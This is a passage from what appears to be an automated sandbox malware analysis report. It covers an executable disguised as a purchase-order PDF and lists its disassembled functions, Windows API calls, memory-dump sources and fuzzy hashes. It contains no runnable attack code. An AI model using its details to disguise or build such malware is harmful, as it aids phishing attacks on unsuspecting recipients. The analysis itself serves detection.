                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                                                                                                                                                                                                            Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                                                                                                                                                                                                            Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                                                                                                                                                                                            • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                                                                                                                                                                                                                            Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                                                                                                                                                                                                            Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                                                                                                                                                            • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                                                                                                                                                                                                            Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000004), ref: 00436055
                                                                                                                                                                                                                                                                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                                                                                                                                                                                                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00436081
                                                                                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1690418490-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                                                                                                                                                            • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                                                                                                                                                                                                            Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: .lnk$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 886957087-3121654589
                                                                                                                                                                                                                                                                                                            • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                                                                                                                                                                                                            • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                                                                                                                                                                                                                                            Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 1173514356-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                                                                                                                                                                                            • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                                                                                                                                                                                                                            Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                            • API String ID: 763830540-1403004172
                                                                                                                                                                                                                                                                                                            • Opcode ID: 44fe3b85dcbf90c67fff98854e7c77623399059caca8f2f1d868b760baf55fc2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44fe3b85dcbf90c67fff98854e7c77623399059caca8f2f1d868b760baf55fc2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                                                                                                                                                                                                                            Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                                            • API String ID: 2124370227-2873401336
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                                                                                                                                                                                            • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                                                                                                                                                                                                            Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
